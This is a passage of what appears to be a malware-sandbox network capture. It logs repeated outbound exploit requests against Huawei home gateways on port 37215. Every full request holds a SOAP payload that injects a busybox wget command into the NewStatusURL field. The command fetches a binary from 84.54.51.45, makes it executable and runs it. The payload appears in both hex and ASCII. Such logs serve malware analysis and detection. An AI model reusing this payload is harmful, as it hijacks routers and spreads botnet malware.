                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            1173192.168.2.155063441.158.188.19837215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:11.175376892 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            1174192.168.2.155794841.188.245.7437215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:11.175405979 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            1175192.168.2.154129441.179.248.18837215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:11.175462008 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            1176192.168.2.153661241.167.159.23437215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:11.175497055 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            1177192.168.2.154418041.235.167.937215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:11.175523996 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            1178192.168.2.154442641.94.126.17137215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:11.175551891 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            1179192.168.2.154194241.118.108.3837215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:11.175553083 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            1180192.168.2.154485241.216.44.14237215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:11.175575972 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            1181192.168.2.155698041.56.240.1937215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:11.175631046 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            1182192.168.2.154753441.106.24.6437215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:11.175642967 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
